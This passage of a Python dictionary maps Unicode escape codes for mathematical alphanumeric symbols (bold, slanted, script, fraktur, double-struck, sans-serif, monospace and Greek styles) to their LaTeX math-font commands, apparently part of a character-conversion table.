u"\uD415":"\\mathbf{V}",
u"\uD416":"\\mathbf{W}",
u"\uD417":"\\mathbf{X}",
u"\uD418":"\\mathbf{Y}",
u"\uD419":"\\mathbf{Z}",
u"\uD41A":"\\mathbf{a}",
u"\uD41B":"\\mathbf{b}",
u"\uD41C":"\\mathbf{c}",
u"\uD41D":"\\mathbf{d}",
u"\uD41E":"\\mathbf{e}",
u"\uD41F":"\\mathbf{f}",
u"\uD420":"\\mathbf{g}",
u"\uD421":"\\mathbf{h}",
u"\uD422":"\\mathbf{i}",
u"\uD423":"\\mathbf{j}",
u"\uD424":"\\mathbf{k}",
u"\uD425":"\\mathbf{l}",
u"\uD426":"\\mathbf{m}",
u"\uD427":"\\mathbf{n}",
u"\uD428":"\\mathbf{o}",
u"\uD429":"\\mathbf{p}",
u"\uD42A":"\\mathbf{q}",
u"\uD42B":"\\mathbf{r}",
u"\uD42C":"\\mathbf{s}",
u"\uD42D":"\\mathbf{t}",
u"\uD42E":"\\mathbf{u}",
u"\uD42F":"\\mathbf{v}",
u"\uD430":"\\mathbf{w}",
u"\uD431":"\\mathbf{x}",
u"\uD432":"\\mathbf{y}",
u"\uD433":"\\mathbf{z}",
u"\uD434":"\\mathsl{A}",
u"\uD435":"\\mathsl{B}",
u"\uD436":"\\mathsl{C}",
u"\uD437":"\\mathsl{D}",
u"\uD438":"\\mathsl{E}",
u"\uD439":"\\mathsl{F}",
u"\uD43A":"\\mathsl{G}",
u"\uD43B":"\\mathsl{H}",
u"\uD43C":"\\mathsl{I}",
u"\uD43D":"\\mathsl{J}",
u"\uD43E":"\\mathsl{K}",
u"\uD43F":"\\mathsl{L}",
u"\uD440":"\\mathsl{M}",
u"\uD441":"\\mathsl{N}",
u"\uD442":"\\mathsl{O}",
u"\uD443":"\\mathsl{P}",
u"\uD444":"\\mathsl{Q}",
u"\uD445":"\\mathsl{R}",
u"\uD446":"\\mathsl{S}",
u"\uD447":"\\mathsl{T}",
u"\uD448":"\\mathsl{U}",
u"\uD449":"\\mathsl{V}",
u"\uD44A":"\\mathsl{W}",
u"\uD44B":"\\mathsl{X}",
u"\uD44C":"\\mathsl{Y}",
u"\uD44D":"\\mathsl{Z}",
u"\uD44E":"\\mathsl{a}",
u"\uD44F":"\\mathsl{b}",
u"\uD450":"\\mathsl{c}",
u"\uD451":"\\mathsl{d}",
u"\uD452":"\\mathsl{e}",
u"\uD453":"\\mathsl{f}",
u"\uD454":"\\mathsl{g}",
u"\uD456":"\\mathsl{i}",
u"\uD457":"\\mathsl{j}",
u"\uD458":"\\mathsl{k}",
u"\uD459":"\\mathsl{l}",
u"\uD45A":"\\mathsl{m}",
u"\uD45B":"\\mathsl{n}",
u"\uD45C":"\\mathsl{o}",
u"\uD45D":"\\mathsl{p}",
u"\uD45E":"\\mathsl{q}",
u"\uD45F":"\\mathsl{r}",
u"\uD460":"\\mathsl{s}",
u"\uD461":"\\mathsl{t}",
u"\uD462":"\\mathsl{u}",
u"\uD463":"\\mathsl{v}",
u"\uD464":"\\mathsl{w}",
u"\uD465":"\\mathsl{x}",
u"\uD466":"\\mathsl{y}",
u"\uD467":"\\mathsl{z}",
u"\uD468":"\\mathbit{A}",
u"\uD469":"\\mathbit{B}",
u"\uD46A":"\\mathbit{C}",
u"\uD46B":"\\mathbit{D}",
u"\uD46C":"\\mathbit{E}",
u"\uD46D":"\\mathbit{F}",
u"\uD46E":"\\mathbit{G}",
u"\uD46F":"\\mathbit{H}",
u"\uD470":"\\mathbit{I}",
u"\uD471":"\\mathbit{J}",
u"\uD472":"\\mathbit{K}",
u"\uD473":"\\mathbit{L}",
u"\uD474":"\\mathbit{M}",
u"\uD475":"\\mathbit{N}",
u"\uD476":"\\mathbit{O}",
u"\uD477":"\\mathbit{P}",
u"\uD478":"\\mathbit{Q}",
u"\uD479":"\\mathbit{R}",
u"\uD47A":"\\mathbit{S}",
u"\uD47B":"\\mathbit{T}",
u"\uD47C":"\\mathbit{U}",
u"\uD47D":"\\mathbit{V}",
u"\uD47E":"\\mathbit{W}",
u"\uD47F":"\\mathbit{X}",
u"\uD480":"\\mathbit{Y}",
u"\uD481":"\\mathbit{Z}",
u"\uD482":"\\mathbit{a}",
u"\uD483":"\\mathbit{b}",
u"\uD484":"\\mathbit{c}",
u"\uD485":"\\mathbit{d}",
u"\uD486":"\\mathbit{e}",
u"\uD487":"\\mathbit{f}",
u"\uD488":"\\mathbit{g}",
u"\uD489":"\\mathbit{h}",
u"\uD48A":"\\mathbit{i}",
u"\uD48B":"\\mathbit{j}",
u"\uD48C":"\\mathbit{k}",
u"\uD48D":"\\mathbit{l}",
u"\uD48E":"\\mathbit{m}",
u"\uD48F":"\\mathbit{n}",
u"\uD490":"\\mathbit{o}",
u"\uD491":"\\mathbit{p}",
u"\uD492":"\\mathbit{q}",
u"\uD493":"\\mathbit{r}",
u"\uD494":"\\mathbit{s}",
u"\uD495":"\\mathbit{t}",
u"\uD496":"\\mathbit{u}",
u"\uD497":"\\mathbit{v}",
u"\uD498":"\\mathbit{w}",
u"\uD499":"\\mathbit{x}",
u"\uD49A":"\\mathbit{y}",
u"\uD49B":"\\mathbit{z}",
u"\uD49C":"\\mathscr{A}",
u"\uD49E":"\\mathscr{C}",
u"\uD49F":"\\mathscr{D}",
u"\uD4A2":"\\mathscr{G}",
u"\uD4A5":"\\mathscr{J}",
u"\uD4A6":"\\mathscr{K}",
u"\uD4A9":"\\mathscr{N}",
u"\uD4AA":"\\mathscr{O}",
u"\uD4AB":"\\mathscr{P}",
u"\uD4AC":"\\mathscr{Q}",
u"\uD4AE":"\\mathscr{S}",
u"\uD4AF":"\\mathscr{T}",
u"\uD4B0":"\\mathscr{U}",
u"\uD4B1":"\\mathscr{V}",
u"\uD4B2":"\\mathscr{W}",
u"\uD4B3":"\\mathscr{X}",
u"\uD4B4":"\\mathscr{Y}",
u"\uD4B5":"\\mathscr{Z}",
u"\uD4B6":"\\mathscr{a}",
u"\uD4B7":"\\mathscr{b}",
u"\uD4B8":"\\mathscr{c}",
u"\uD4B9":"\\mathscr{d}",
u"\uD4BB":"\\mathscr{f}",
u"\uD4BD":"\\mathscr{h}",
u"\uD4BE":"\\mathscr{i}",
u"\uD4BF":"\\mathscr{j}",
u"\uD4C0":"\\mathscr{k}",
u"\uD4C1":"\\mathscr{l}",
u"\uD4C2":"\\mathscr{m}",
u"\uD4C3":"\\mathscr{n}",
u"\uD4C5":"\\mathscr{p}",
u"\uD4C6":"\\mathscr{q}",
u"\uD4C7":"\\mathscr{r}",
u"\uD4C8":"\\mathscr{s}",
u"\uD4C9":"\\mathscr{t}",
u"\uD4CA":"\\mathscr{u}",
u"\uD4CB":"\\mathscr{v}",
u"\uD4CC":"\\mathscr{w}",
u"\uD4CD":"\\mathscr{x}",
u"\uD4CE":"\\mathscr{y}",
u"\uD4CF":"\\mathscr{z}",
u"\uD4D0":"\\mathmit{A}",
u"\uD4D1":"\\mathmit{B}",
u"\uD4D2":"\\mathmit{C}",
u"\uD4D3":"\\mathmit{D}",
u"\uD4D4":"\\mathmit{E}",
u"\uD4D5":"\\mathmit{F}",
u"\uD4D6":"\\mathmit{G}",
u"\uD4D7":"\\mathmit{H}",
u"\uD4D8":"\\mathmit{I}",
u"\uD4D9":"\\mathmit{J}",
u"\uD4DA":"\\mathmit{K}",
u"\uD4DB":"\\mathmit{L}",
u"\uD4DC":"\\mathmit{M}",
u"\uD4DD":"\\mathmit{N}",
u"\uD4DE":"\\mathmit{O}",
u"\uD4DF":"\\mathmit{P}",
u"\uD4E0":"\\mathmit{Q}",
u"\uD4E1":"\\mathmit{R}",
u"\uD4E2":"\\mathmit{S}",
u"\uD4E3":"\\mathmit{T}",
u"\uD4E4":"\\mathmit{U}",
u"\uD4E5":"\\mathmit{V}",
u"\uD4E6":"\\mathmit{W}",
u"\uD4E7":"\\mathmit{X}",
u"\uD4E8":"\\mathmit{Y}",
u"\uD4E9":"\\mathmit{Z}",
u"\uD4EA":"\\mathmit{a}",
u"\uD4EB":"\\mathmit{b}",
u"\uD4EC":"\\mathmit{c}",
u"\uD4ED":"\\mathmit{d}",
u"\uD4EE":"\\mathmit{e}",
u"\uD4EF":"\\mathmit{f}",
u"\uD4F0":"\\mathmit{g}",
u"\uD4F1":"\\mathmit{h}",
u"\uD4F2":"\\mathmit{i}",
u"\uD4F3":"\\mathmit{j}",
u"\uD4F4":"\\mathmit{k}",
u"\uD4F5":"\\mathmit{l}",
u"\uD4F6":"\\mathmit{m}",
u"\uD4F7":"\\mathmit{n}",
u"\uD4F8":"\\mathmit{o}",
u"\uD4F9":"\\mathmit{p}",
u"\uD4FA":"\\mathmit{q}",
u"\uD4FB":"\\mathmit{r}",
u"\uD4FC":"\\mathmit{s}",
u"\uD4FD":"\\mathmit{t}",
u"\uD4FE":"\\mathmit{u}",
u"\uD4FF":"\\mathmit{v}",
u"\uD500":"\\mathmit{w}",
u"\uD501":"\\mathmit{x}",
u"\uD502":"\\mathmit{y}",
u"\uD503":"\\mathmit{z}",
u"\uD504":"\\mathfrak{A}",
u"\uD505":"\\mathfrak{B}",
u"\uD507":"\\mathfrak{D}",
u"\uD508":"\\mathfrak{E}",
u"\uD509":"\\mathfrak{F}",
u"\uD50A":"\\mathfrak{G}",
u"\uD50D":"\\mathfrak{J}",
u"\uD50E":"\\mathfrak{K}",
u"\uD50F":"\\mathfrak{L}",
u"\uD510":"\\mathfrak{M}",
u"\uD511":"\\mathfrak{N}",
u"\uD512":"\\mathfrak{O}",
u"\uD513":"\\mathfrak{P}",
u"\uD514":"\\mathfrak{Q}",
u"\uD516":"\\mathfrak{S}",
u"\uD517":"\\mathfrak{T}",
u"\uD518":"\\mathfrak{U}",
u"\uD519":"\\mathfrak{V}",
u"\uD51A":"\\mathfrak{W}",
u"\uD51B":"\\mathfrak{X}",
u"\uD51C":"\\mathfrak{Y}",
u"\uD51E":"\\mathfrak{a}",
u"\uD51F":"\\mathfrak{b}",
u"\uD520":"\\mathfrak{c}",
u"\uD521":"\\mathfrak{d}",
u"\uD522":"\\mathfrak{e}",
u"\uD523":"\\mathfrak{f}",
u"\uD524":"\\mathfrak{g}",
u"\uD525":"\\mathfrak{h}",
u"\uD526":"\\mathfrak{i}",
u"\uD527":"\\mathfrak{j}",
u"\uD528":"\\mathfrak{k}",
u"\uD529":"\\mathfrak{l}",
u"\uD52A":"\\mathfrak{m}",
u"\uD52B":"\\mathfrak{n}",
u"\uD52C":"\\mathfrak{o}",
u"\uD52D":"\\mathfrak{p}",
u"\uD52E":"\\mathfrak{q}",
u"\uD52F":"\\mathfrak{r}",
u"\uD530":"\\mathfrak{s}",
u"\uD531":"\\mathfrak{t}",
u"\uD532":"\\mathfrak{u}",
u"\uD533":"\\mathfrak{v}",
u"\uD534":"\\mathfrak{w}",
u"\uD535":"\\mathfrak{x}",
u"\uD536":"\\mathfrak{y}",
u"\uD537":"\\mathfrak{z}",
u"\uD538":"\\mathbb{A}",
u"\uD539":"\\mathbb{B}",
u"\uD53B":"\\mathbb{D}",
u"\uD53C":"\\mathbb{E}",
u"\uD53D":"\\mathbb{F}",
u"\uD53E":"\\mathbb{G}",
u"\uD540":"\\mathbb{I}",
u"\uD541":"\\mathbb{J}",
u"\uD542":"\\mathbb{K}",
u"\uD543":"\\mathbb{L}",
u"\uD544":"\\mathbb{M}",
u"\uD546":"\\mathbb{O}",
u"\uD54A":"\\mathbb{S}",
u"\uD54B":"\\mathbb{T}",
u"\uD54C":"\\mathbb{U}",
u"\uD54D":"\\mathbb{V}",
u"\uD54E":"\\mathbb{W}",
u"\uD54F":"\\mathbb{X}",
u"\uD550":"\\mathbb{Y}",
u"\uD552":"\\mathbb{a}",
u"\uD553":"\\mathbb{b}",
u"\uD554":"\\mathbb{c}",
u"\uD555":"\\mathbb{d}",
u"\uD556":"\\mathbb{e}",
u"\uD557":"\\mathbb{f}",
u"\uD558":"\\mathbb{g}",
u"\uD559":"\\mathbb{h}",
u"\uD55A":"\\mathbb{i}",
u"\uD55B":"\\mathbb{j}",
u"\uD55C":"\\mathbb{k}",
u"\uD55D":"\\mathbb{l}",
u"\uD55E":"\\mathbb{m}",
u"\uD55F":"\\mathbb{n}",
u"\uD560":"\\mathbb{o}",
u"\uD561":"\\mathbb{p}",
u"\uD562":"\\mathbb{q}",
u"\uD563":"\\mathbb{r}",
u"\uD564":"\\mathbb{s}",
u"\uD565":"\\mathbb{t}",
u"\uD566":"\\mathbb{u}",
u"\uD567":"\\mathbb{v}",
u"\uD568":"\\mathbb{w}",
u"\uD569":"\\mathbb{x}",
u"\uD56A":"\\mathbb{y}",
u"\uD56B":"\\mathbb{z}",
u"\uD56C":"\\mathslbb{A}",
u"\uD56D":"\\mathslbb{B}",
u"\uD56E":"\\mathslbb{C}",
u"\uD56F":"\\mathslbb{D}",
u"\uD570":"\\mathslbb{E}",
u"\uD571":"\\mathslbb{F}",
u"\uD572":"\\mathslbb{G}",
u"\uD573":"\\mathslbb{H}",
u"\uD574":"\\mathslbb{I}",
u"\uD575":"\\mathslbb{J}",
u"\uD576":"\\mathslbb{K}",
u"\uD577":"\\mathslbb{L}",
u"\uD578":"\\mathslbb{M}",
u"\uD579":"\\mathslbb{N}",
u"\uD57A":"\\mathslbb{O}",
u"\uD57B":"\\mathslbb{P}",
u"\uD57C":"\\mathslbb{Q}",
u"\uD57D":"\\mathslbb{R}",
u"\uD57E":"\\mathslbb{S}",
u"\uD57F":"\\mathslbb{T}",
u"\uD580":"\\mathslbb{U}",
u"\uD581":"\\mathslbb{V}",
u"\uD582":"\\mathslbb{W}",
u"\uD583":"\\mathslbb{X}",
u"\uD584":"\\mathslbb{Y}",
u"\uD585":"\\mathslbb{Z}",
u"\uD586":"\\mathslbb{a}",
u"\uD587":"\\mathslbb{b}",
u"\uD588":"\\mathslbb{c}",
u"\uD589":"\\mathslbb{d}",
u"\uD58A":"\\mathslbb{e}",
u"\uD58B":"\\mathslbb{f}",
u"\uD58C":"\\mathslbb{g}",
u"\uD58D":"\\mathslbb{h}",
u"\uD58E":"\\mathslbb{i}",
u"\uD58F":"\\mathslbb{j}",
u"\uD590":"\\mathslbb{k}",
u"\uD591":"\\mathslbb{l}",
u"\uD592":"\\mathslbb{m}",
u"\uD593":"\\mathslbb{n}",
u"\uD594":"\\mathslbb{o}",
u"\uD595":"\\mathslbb{p}",
u"\uD596":"\\mathslbb{q}",
u"\uD597":"\\mathslbb{r}",
u"\uD598":"\\mathslbb{s}",
u"\uD599":"\\mathslbb{t}",
u"\uD59A":"\\mathslbb{u}",
u"\uD59B":"\\mathslbb{v}",
u"\uD59C":"\\mathslbb{w}",
u"\uD59D":"\\mathslbb{x}",
u"\uD59E":"\\mathslbb{y}",
u"\uD59F":"\\mathslbb{z}",
u"\uD5A0":"\\mathsf{A}",
u"\uD5A1":"\\mathsf{B}",
u"\uD5A2":"\\mathsf{C}",
u"\uD5A3":"\\mathsf{D}",
u"\uD5A4":"\\mathsf{E}",
u"\uD5A5":"\\mathsf{F}",
u"\uD5A6":"\\mathsf{G}",
u"\uD5A7":"\\mathsf{H}",
u"\uD5A8":"\\mathsf{I}",
u"\uD5A9":"\\mathsf{J}",
u"\uD5AA":"\\mathsf{K}",
u"\uD5AB":"\\mathsf{L}",
u"\uD5AC":"\\mathsf{M}",
u"\uD5AD":"\\mathsf{N}",
u"\uD5AE":"\\mathsf{O}",
u"\uD5AF":"\\mathsf{P}",
u"\uD5B0":"\\mathsf{Q}",
u"\uD5B1":"\\mathsf{R}",
u"\uD5B2":"\\mathsf{S}",
u"\uD5B3":"\\mathsf{T}",
u"\uD5B4":"\\mathsf{U}",
u"\uD5B5":"\\mathsf{V}",
u"\uD5B6":"\\mathsf{W}",
u"\uD5B7":"\\mathsf{X}",
u"\uD5B8":"\\mathsf{Y}",
u"\uD5B9":"\\mathsf{Z}",
u"\uD5BA":"\\mathsf{a}",
u"\uD5BB":"\\mathsf{b}",
u"\uD5BC":"\\mathsf{c}",
u"\uD5BD":"\\mathsf{d}",
u"\uD5BE":"\\mathsf{e}",
u"\uD5BF":"\\mathsf{f}",
u"\uD5C0":"\\mathsf{g}",
u"\uD5C1":"\\mathsf{h}",
u"\uD5C2":"\\mathsf{i}",
u"\uD5C3":"\\mathsf{j}",
u"\uD5C4":"\\mathsf{k}",
u"\uD5C5":"\\mathsf{l}",
u"\uD5C6":"\\mathsf{m}",
u"\uD5C7":"\\mathsf{n}",
u"\uD5C8":"\\mathsf{o}",
u"\uD5C9":"\\mathsf{p}",
u"\uD5CA":"\\mathsf{q}",
u"\uD5CB":"\\mathsf{r}",
u"\uD5CC":"\\mathsf{s}",
u"\uD5CD":"\\mathsf{t}",
u"\uD5CE":"\\mathsf{u}",
u"\uD5CF":"\\mathsf{v}",
u"\uD5D0":"\\mathsf{w}",
u"\uD5D1":"\\mathsf{x}",
u"\uD5D2":"\\mathsf{y}",
u"\uD5D3":"\\mathsf{z}",
u"\uD5D4":"\\mathsfbf{A}",
u"\uD5D5":"\\mathsfbf{B}",
u"\uD5D6":"\\mathsfbf{C}",
u"\uD5D7":"\\mathsfbf{D}",
u"\uD5D8":"\\mathsfbf{E}",
u"\uD5D9":"\\mathsfbf{F}",
u"\uD5DA":"\\mathsfbf{G}",
u"\uD5DB":"\\mathsfbf{H}",
u"\uD5DC":"\\mathsfbf{I}",
u"\uD5DD":"\\mathsfbf{J}",
u"\uD5DE":"\\mathsfbf{K}",
u"\uD5DF":"\\mathsfbf{L}",
u"\uD5E0":"\\mathsfbf{M}",
u"\uD5E1":"\\mathsfbf{N}",
u"\uD5E2":"\\mathsfbf{O}",
u"\uD5E3":"\\mathsfbf{P}",
u"\uD5E4":"\\mathsfbf{Q}",
u"\uD5E5":"\\mathsfbf{R}",
u"\uD5E6":"\\mathsfbf{S}",
u"\uD5E7":"\\mathsfbf{T}",
u"\uD5E8":"\\mathsfbf{U}",
u"\uD5E9":"\\mathsfbf{V}",
u"\uD5EA":"\\mathsfbf{W}",
u"\uD5EB":"\\mathsfbf{X}",
u"\uD5EC":"\\mathsfbf{Y}",
u"\uD5ED":"\\mathsfbf{Z}",
u"\uD5EE":"\\mathsfbf{a}",
u"\uD5EF":"\\mathsfbf{b}",
u"\uD5F0":"\\mathsfbf{c}",
u"\uD5F1":"\\mathsfbf{d}",
u"\uD5F2":"\\mathsfbf{e}",
u"\uD5F3":"\\mathsfbf{f}",
u"\uD5F4":"\\mathsfbf{g}",
u"\uD5F5":"\\mathsfbf{h}",
u"\uD5F6":"\\mathsfbf{i}",
u"\uD5F7":"\\mathsfbf{j}",
u"\uD5F8":"\\mathsfbf{k}",
u"\uD5F9":"\\mathsfbf{l}",
u"\uD5FA":"\\mathsfbf{m}",
u"\uD5FB":"\\mathsfbf{n}",
u"\uD5FC":"\\mathsfbf{o}",
u"\uD5FD":"\\mathsfbf{p}",
u"\uD5FE":"\\mathsfbf{q}",
u"\uD5FF":"\\mathsfbf{r}",
u"\uD600":"\\mathsfbf{s}",
u"\uD601":"\\mathsfbf{t}",
u"\uD602":"\\mathsfbf{u}",
u"\uD603":"\\mathsfbf{v}",
u"\uD604":"\\mathsfbf{w}",
u"\uD605":"\\mathsfbf{x}",
u"\uD606":"\\mathsfbf{y}",
u"\uD607":"\\mathsfbf{z}",
u"\uD608":"\\mathsfsl{A}",
u"\uD609":"\\mathsfsl{B}",
u"\uD60A":"\\mathsfsl{C}",
u"\uD60B":"\\mathsfsl{D}",
u"\uD60C":"\\mathsfsl{E}",
u"\uD60D":"\\mathsfsl{F}",
u"\uD60E":"\\mathsfsl{G}",
u"\uD60F":"\\mathsfsl{H}",
u"\uD610":"\\mathsfsl{I}",
u"\uD611":"\\mathsfsl{J}",
u"\uD612":"\\mathsfsl{K}",
u"\uD613":"\\mathsfsl{L}",
u"\uD614":"\\mathsfsl{M}",
u"\uD615":"\\mathsfsl{N}",
u"\uD616":"\\mathsfsl{O}",
u"\uD617":"\\mathsfsl{P}",
u"\uD618":"\\mathsfsl{Q}",
u"\uD619":"\\mathsfsl{R}",
u"\uD61A":"\\mathsfsl{S}",
u"\uD61B":"\\mathsfsl{T}",
u"\uD61C":"\\mathsfsl{U}",
u"\uD61D":"\\mathsfsl{V}",
u"\uD61E":"\\mathsfsl{W}",
u"\uD61F":"\\mathsfsl{X}",
u"\uD620":"\\mathsfsl{Y}",
u"\uD621":"\\mathsfsl{Z}",
u"\uD622":"\\mathsfsl{a}",
u"\uD623":"\\mathsfsl{b}",
u"\uD624":"\\mathsfsl{c}",
u"\uD625":"\\mathsfsl{d}",
u"\uD626":"\\mathsfsl{e}",
u"\uD627":"\\mathsfsl{f}",
u"\uD628":"\\mathsfsl{g}",
u"\uD629":"\\mathsfsl{h}",
u"\uD62A":"\\mathsfsl{i}",
u"\uD62B":"\\mathsfsl{j}",
u"\uD62C":"\\mathsfsl{k}",
u"\uD62D":"\\mathsfsl{l}",
u"\uD62E":"\\mathsfsl{m}",
u"\uD62F":"\\mathsfsl{n}",
u"\uD630":"\\mathsfsl{o}",
u"\uD631":"\\mathsfsl{p}",
u"\uD632":"\\mathsfsl{q}",
u"\uD633":"\\mathsfsl{r}",
u"\uD634":"\\mathsfsl{s}",
u"\uD635":"\\mathsfsl{t}",
u"\uD636":"\\mathsfsl{u}",
u"\uD637":"\\mathsfsl{v}",
u"\uD638":"\\mathsfsl{w}",
u"\uD639":"\\mathsfsl{x}",
u"\uD63A":"\\mathsfsl{y}",
u"\uD63B":"\\mathsfsl{z}",
u"\uD63C":"\\mathsfbfsl{A}",
u"\uD63D":"\\mathsfbfsl{B}",
u"\uD63E":"\\mathsfbfsl{C}",
u"\uD63F":"\\mathsfbfsl{D}",
u"\uD640":"\\mathsfbfsl{E}",
u"\uD641":"\\mathsfbfsl{F}",
u"\uD642":"\\mathsfbfsl{G}",
u"\uD643":"\\mathsfbfsl{H}",
u"\uD644":"\\mathsfbfsl{I}",
u"\uD645":"\\mathsfbfsl{J}",
u"\uD646":"\\mathsfbfsl{K}",
u"\uD647":"\\mathsfbfsl{L}",
u"\uD648":"\\mathsfbfsl{M}",
u"\uD649":"\\mathsfbfsl{N}",
u"\uD64A":"\\mathsfbfsl{O}",
u"\uD64B":"\\mathsfbfsl{P}",
u"\uD64C":"\\mathsfbfsl{Q}",
u"\uD64D":"\\mathsfbfsl{R}",
u"\uD64E":"\\mathsfbfsl{S}",
u"\uD64F":"\\mathsfbfsl{T}",
u"\uD650":"\\mathsfbfsl{U}",
u"\uD651":"\\mathsfbfsl{V}",
u"\uD652":"\\mathsfbfsl{W}",
u"\uD653":"\\mathsfbfsl{X}",
u"\uD654":"\\mathsfbfsl{Y}",
u"\uD655":"\\mathsfbfsl{Z}",
u"\uD656":"\\mathsfbfsl{a}",
u"\uD657":"\\mathsfbfsl{b}",
u"\uD658":"\\mathsfbfsl{c}",
u"\uD659":"\\mathsfbfsl{d}",
u"\uD65A":"\\mathsfbfsl{e}",
u"\uD65B":"\\mathsfbfsl{f}",
u"\uD65C":"\\mathsfbfsl{g}",
u"\uD65D":"\\mathsfbfsl{h}",
u"\uD65E":"\\mathsfbfsl{i}",
u"\uD65F":"\\mathsfbfsl{j}",
u"\uD660":"\\mathsfbfsl{k}",
u"\uD661":"\\mathsfbfsl{l}",
u"\uD662":"\\mathsfbfsl{m}",
u"\uD663":"\\mathsfbfsl{n}",
u"\uD664":"\\mathsfbfsl{o}",
u"\uD665":"\\mathsfbfsl{p}",
u"\uD666":"\\mathsfbfsl{q}",
u"\uD667":"\\mathsfbfsl{r}",
u"\uD668":"\\mathsfbfsl{s}",
u"\uD669":"\\mathsfbfsl{t}",
u"\uD66A":"\\mathsfbfsl{u}",
u"\uD66B":"\\mathsfbfsl{v}",
u"\uD66C":"\\mathsfbfsl{w}",
u"\uD66D":"\\mathsfbfsl{x}",
u"\uD66E":"\\mathsfbfsl{y}",
u"\uD66F":"\\mathsfbfsl{z}",
u"\uD670":"\\mathtt{A}",
u"\uD671":"\\mathtt{B}",
u"\uD672":"\\mathtt{C}",
u"\uD673":"\\mathtt{D}",
u"\uD674":"\\mathtt{E}",
u"\uD675":"\\mathtt{F}",
u"\uD676":"\\mathtt{G}",
u"\uD677":"\\mathtt{H}",
u"\uD678":"\\mathtt{I}",
u"\uD679":"\\mathtt{J}",
u"\uD67A":"\\mathtt{K}",
u"\uD67B":"\\mathtt{L}",
u"\uD67C":"\\mathtt{M}",
u"\uD67D":"\\mathtt{N}",
u"\uD67E":"\\mathtt{O}",
u"\uD67F":"\\mathtt{P}",
u"\uD680":"\\mathtt{Q}",
u"\uD681":"\\mathtt{R}",
u"\uD682":"\\mathtt{S}",
u"\uD683":"\\mathtt{T}",
u"\uD684":"\\mathtt{U}",
u"\uD685":"\\mathtt{V}",
u"\uD686":"\\mathtt{W}",
u"\uD687":"\\mathtt{X}",
u"\uD688":"\\mathtt{Y}",
u"\uD689":"\\mathtt{Z}",
u"\uD68A":"\\mathtt{a}",
u"\uD68B":"\\mathtt{b}",
u"\uD68C":"\\mathtt{c}",
u"\uD68D":"\\mathtt{d}",
u"\uD68E":"\\mathtt{e}",
u"\uD68F":"\\mathtt{f}",
u"\uD690":"\\mathtt{g}",
u"\uD691":"\\mathtt{h}",
u"\uD692":"\\mathtt{i}",
u"\uD693":"\\mathtt{j}",
u"\uD694":"\\mathtt{k}",
u"\uD695":"\\mathtt{l}",
u"\uD696":"\\mathtt{m}",
u"\uD697":"\\mathtt{n}",
u"\uD698":"\\mathtt{o}",
u"\uD699":"\\mathtt{p}",
u"\uD69A":"\\mathtt{q}",
u"\uD69B":"\\mathtt{r}",
u"\uD69C":"\\mathtt{s}",
u"\uD69D":"\\mathtt{t}",
u"\uD69E":"\\mathtt{u}",
u"\uD69F":"\\mathtt{v}",
u"\uD6A0":"\\mathtt{w}",
u"\uD6A1":"\\mathtt{x}",
u"\uD6A2":"\\mathtt{y}",
u"\uD6A3":"\\mathtt{z}",
u"\uD6A8":"\\mathbf{\\Alpha}",
u"\uD6A9":"\\mathbf{\\Beta}",
u"\uD6AA":"\\mathbf{\\Gamma}",
u"\uD6AB":"\\mathbf{\\Delta}",
u"\uD6AC":"\\mathbf{\\Epsilon}",
u"\uD6AD":"\\mathbf{\\Zeta}",
u"\uD6AE":"\\mathbf{\\Eta}",
u"\uD6AF":"\\mathbf{\\Theta}",
u"\uD6B0":"\\mathbf{\\Iota}",
u"\uD6B1":"\\mathbf{\\Kappa}",
u"\uD6B2":"\\mathbf{\\Lambda}",
u"\uD6B5":"\\mathbf{\\Xi}",
u"\uD6B7":"\\mathbf{\\Pi}",
u"\uD6B8":"\\mathbf{\\Rho}",
u"\uD6B9":"\\mathbf{\\vartheta}",
u"\uD6BA":"\\mathbf{\\Sigma}",
u"\uD6BB":"\\mathbf{\\Tau}",
u"\uD6BC":"\\mathbf{\\Upsilon}",
u"\uD6BD":"\\mathbf{\\Phi}",
u"\uD6BE":"\\mathbf{\\Chi}",
u"\uD6BF":"\\mathbf{\\Psi}",
u"\uD6C0":"\\mathbf{\\Omega}",
u"\uD6C1":"\\mathbf{\\nabla}",
u"\uD6C2":"\\mathbf{\\Alpha}",
u"\uD6C3":"\\mathbf{\\Beta}",
u"\uD6C4":"\\mathbf{\\Gamma}",
u"\uD6C5":"\\mathbf{\\Delta}",
u"\uD6C6":"\\mathbf{\\Epsilon}",
u"\uD6C7":"\\mathbf{\\Zeta}",
u"\uD6C8":"\\mathbf{\\Eta}",
u"\uD6C9":"\\mathbf{\\theta}",
u"\uD6CA":"\\mathbf{\\Iota}",
u"\uD6CB":"\\mathbf{\\Kappa}",
u"\uD6CC":"\\mathbf{\\Lambda}",
u"\uD6CF":"\\mathbf{\\Xi}",
u"\uD6D1":"\\mathbf{\\Pi}",
u"\uD6D2":"\\mathbf{\\Rho}",
u"\uD6D3":"\\mathbf{\\varsigma}",
u"\uD6D4":"\\mathbf{\\Sigma}",
u"\uD6D5":"\\mathbf{\\Tau}",
u"\uD6D6":"\\mathbf{\\Upsilon}",
u"\uD6D7":"\\mathbf{\\Phi}",
u"\uD6D8":"\\mathbf{\\Chi}",
u"\uD6D9":"\\mathbf{\\Psi}",
u"\uD6DA":"\\mathbf{\\Omega}",
u"\uD6DB":"\\partial",
u"\uD6DC":"\\in",
u"\uD6DD":"\\mathbf{\\vartheta}",
u"\uD6DE":"\\mathbf{\\varkappa}",
u"\uD6DF":"\\mathbf{\\phi}",
u"\uD6E0":"\\mathbf{\\varrho}",
u"\uD6E1":"\\mathbf{\\varpi}",
u"\uD6E2":"\\mathsl{\\Alpha}",
u"\uD6E3":"\\mathsl{\\Beta}",
u"\uD6E4":"\\mathsl{\\Gamma}",
u"\uD6E5":"\\mathsl{\\Delta}",
u"\uD6E6":"\\mathsl{\\Epsilon}",
u"\uD6E7":"\\mathsl{\\Zeta}",
u"\uD6E8":"\\mathsl{\\Eta}",
u"\uD6E9":"\\mathsl{\\Theta}",
u"\uD6EA":"\\mathsl{\\Iota}",
u"\uD6EB":"\\mathsl{\\Kappa}",
u"\uD6EC":"\\mathsl{\\Lambda}",
u"\uD6EF":"\\mathsl{\\Xi}",
u"\uD6F1":"\\mathsl{\\Pi}",
u"\uD6F2":"\\mathsl{\\Rho}",
u"\uD6F3":"\\mathsl{\\vartheta}",
u"\uD6F4":"\\mathsl{\\Sigma}",
u"\uD6F5":"\\mathsl{\\Tau}",
u"\uD6F6":"\\mathsl{\\Upsilon}",
u"\uD6F7":"\\mathsl{\\Phi}",
u"\uD6F8":"\\mathsl{\\Chi}",
u"\uD6F9":"\\mathsl{\\Psi}",
u"\uD6FA":"\\mathsl{\\Omega}",
u"\uD6FB":"\\mathsl{\\nabla}",
u"\uD6FC":"\\mathsl{\\Alpha}",
